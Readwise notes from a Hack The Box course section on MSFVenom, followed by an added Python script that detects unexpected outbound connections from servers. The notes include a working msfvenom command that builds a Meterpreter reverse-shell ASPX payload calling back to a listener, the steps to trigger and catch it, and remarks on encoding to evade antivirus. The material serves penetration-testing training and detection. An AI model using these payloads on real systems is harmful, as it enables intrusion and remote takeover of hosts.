#readwise

# Using the Metasploit Framework - Introduction to MSFVenom

![rw-book-cover](https://readwise-assets.s3.amazonaws.com/static/images/article1.be68295a7e40.png)

## Metadata

- Author: [[Hack The Box]]
- Full Title: Using the Metasploit Framework - Introduction to MSFVenom
- URL: https://academy.hackthebox.com/module/39/section/418

## Summary

MSFVenom combines two previous tools, MSFPayload and MSFEncode, to create customizable payloads for penetration testing. This tool allows users to generate payloads quickly while avoiding errors and evading antivirus systems. In the example, a reverse TCP connection can be established by uploading a PHP shell through an open FTP port. Finally, the Meterpreter shell can be used for further exploitation, leveraging the Local Exploit Suggester for privilege escalation.

## Highlights

`MSFVenom` is the successor of `MSFPayload` and `MSFEncode`, two stand-alone scripts that used to work in conjunction with `msfconsole` to provide users with highly customizable and hard-to-detect payloads for their exploits. `MSFVenom` is the result of the marriage between these two tools. Before this tool, we had to pipe (`|`) the result from `MSFPayload`, which was used to generate shellcode for a specific processor architecture and OS release, into `MSFEncode`, which contained multiple encoding schemes used both for removing bad characters from shellcode (this could sometimes cause instability during the runtime), and for evading older Anti-Virus (`AV`) and endpoint Intrusion Prevention / Intrusion Detection (`IPS/IDS`) software. Nowadays, the two combined tools offer penetration testers a method to quickly craft payloads for different target host architectures and releases while having the possibility to 'clean up' their shellcode so that it does not run into any errors when deployed.

([View Highlight](https://read.readwise.io/read/01js91qkqpx3wf0z8ywa423761))

---

Generating Payload

```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
```

([View Highlight](https://read.readwise.io/read/01js91vfjev80ex1rh24z96sf4))

---

Now, we only need to navigate to `http://10.10.10.5/reverse_shell.aspx`, and it will trigger the `.aspx` payload. Before we do that, however, we should start a listener on `msfconsole` so that the reverse connection request gets caught inside it.

```
msf6 > use multi/handler
```

([View Highlight](https://read.readwise.io/read/01js91w97fnnc267ssjn206gc2))

---

If the Meterpreter session dies too often, we can consider encoding it to avoid errors during runtime. We can pick any viable encoder, and it will ultimately improve our chances of success regardless.

([View Highlight](https://read.readwise.io/read/01js91xhrf0ehesp8cngy6d93p))

---
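The highlights above describe a `reverse_tcp` payload: the web server at `10.10.10.5` dials *out* to the listener at `10.10.14.5:1337`, instead of the listener connecting in. From the defender's side that direction is the tell. A server that only answers requests has no reason to initiate connections, so any egress from it that is not on an allow-list is a cheap, high-signal detection. The script below is an added example, not code from the HTB module or the Readwise export; it uses constructed connection records in a simplified gateway format (the `<initiator>:<port> -> <responder>:<port> <proto>` layout, the host list and the allow-list are all assumptions for illustration) and flags connections the policy does not explain.

```python
"""Flag outbound connections started by hosts that should only serve requests.

Added example, not part of the HTB module. The record format, the serve-only
host list and the egress allow-list below are assumptions for illustration.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Iterable

# Constructed sample records (not real logs). Each line is one connection as a
# gateway would see it: <utc time> <initiator>:<port> -> <responder>:<port> <proto>
SAMPLE_RECORDS = """\
2024-01-01T10:00:01Z 10.10.14.5:51234 -> 10.10.10.5:80 tcp
2024-01-01T10:00:03Z 10.10.10.5:49870 -> 10.10.14.5:1337 tcp
2024-01-01T10:00:04Z 10.10.10.5:49871 -> 10.10.10.2:53 udp
2024-01-01T10:00:05Z 10.10.10.5:49872 -> 10.10.10.3:445 tcp
2024-01-01T10:00:06Z 10.10.14.5:51235 -> 10.10.10.5:21 tcp
"""

# Assumed policy (hypothetical): these hosts answer requests but never dial out,
# except to the explicitly allowed (destination, port, protocol) tuples below.
SERVE_ONLY_HOSTS = {ipaddress.ip_address("10.10.10.5")}
ALLOWED_EGRESS = {(ipaddress.ip_address("10.10.10.2"), 53, "udp")}  # internal DNS


@dataclass(frozen=True)
class Connection:
    ts: str
    src: ipaddress.IPv4Address | ipaddress.IPv6Address
    sport: int
    dst: ipaddress.IPv4Address | ipaddress.IPv6Address
    dport: int
    proto: str


def parse_endpoint(text: str) -> tuple[ipaddress.IPv4Address | ipaddress.IPv6Address, int]:
    """Split 'host:port' into (ip, port); rpartition keeps IPv6 literals intact."""
    host, _, port = text.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def parse_records(text: str) -> list[Connection]:
    """Parse the constructed record format; malformed lines raise rather than hide."""
    conns: list[Connection] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, arrow, dst, proto = line.split()
        if arrow != "->":
            raise ValueError(f"unexpected record format: {line!r}")
        s_ip, s_port = parse_endpoint(src)
        d_ip, d_port = parse_endpoint(dst)
        conns.append(Connection(ts, s_ip, s_port, d_ip, d_port, proto.lower()))
    return conns


def unexpected_egress(conns: Iterable[Connection]) -> list[Connection]:
    """Connections initiated by a serve-only host to a destination not on the allow-list."""
    return [
        c
        for c in conns
        if c.src in SERVE_ONLY_HOSTS and (c.dst, c.dport, c.proto) not in ALLOWED_EGRESS
    ]


def main() -> None:
    for c in unexpected_egress(parse_records(SAMPLE_RECORDS)):
        print(f"{c.ts} serve-only host {c.src} opened {c.proto} to {c.dst}:{c.dport}")


if __name__ == "__main__":
    main()
```

Run against the sample, it reports the connection to `10.10.14.5:1337` (the reverse shell calling home) and the SMB connection to `10.10.10.3:445`, while the inbound web and FTP requests and the allow-listed DNS lookup pass silently. The port number carries no weight in the rule: a listener on 443 would be flagged just the same, which is why an egress allow-list on servers is more robust than any list of "known bad" ports.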